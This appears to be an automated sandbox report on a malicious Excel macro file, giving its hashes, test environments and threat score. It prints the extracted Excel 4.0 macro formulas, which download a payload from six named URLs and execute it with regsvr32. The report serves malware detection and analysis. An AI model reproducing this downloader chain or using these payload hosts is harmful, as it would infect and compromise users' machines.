General
Target: 3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
Size: 29KB
Sample: 241111-w4lq3atcmn
MD5: 83a9d33633b5d860d1f23980d432c773
SHA1: 707ecacd3604c35017a2daa8961301a653e6187f
SHA256: 3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
SHA512: 84c8747f8d8f728ba2a50e1ab4efb0204d766c8cfca219fb8576241c107c7250cda3cd775309193c3854dd2f10d8d64a71e6e03fa1f6c5b77275f5629eda3cdf
SSDEEP: 384:VDr77gLEQgRL2sOr1U6ZlEnBcvgSTxxZkN6L+tjU5qhd8VqBHO8D9JJJ4IVwb:JPELA2s61VECvgOZS4+NcDVOXD9F4IG
Behavioral task: behavioral1
Sample: 3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b.xlsm
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b.xlsm
Resource: win10v2004-20241007-en
Malware Config
Extracted
formulas
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://janshabd.com/E33ZFv/","..\dw.ocx",0,0)
=IF('OFJOV'!D11<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://amorespasalon.com/wp-admin/ZsK0FbGGLqNpmzL/","..\dw.ocx",0,0))
=IF('OFJOV'!D13<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://vulkanvegasbonus.jeunete.com/wp-content/hAAFJQA1Bm/","..\dw.ocx",0,0))
=IF('OFJOV'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.aacitygroup.com/mordacity/g29PQhuYA5x/","..\dw.ocx",0,0))
=IF('OFJOV'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://actividades.laforetlanguages.com/wp-admin/uKLMwQwwo0W/","..\dw.ocx",0,0))
=IF('OFJOV'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://sse-studio.com/cq0xhpj/wdktmllfAYV/","..\dw.ocx",0,0))
=IF('OFJOV'!D21<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\dw.ocx")
=RETURN()
Targets
Target: 3439367f3e0e4abd2579d16bbd004426a2df77da96b2b40bfe1b8497e4da258b
Score: 10/10
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.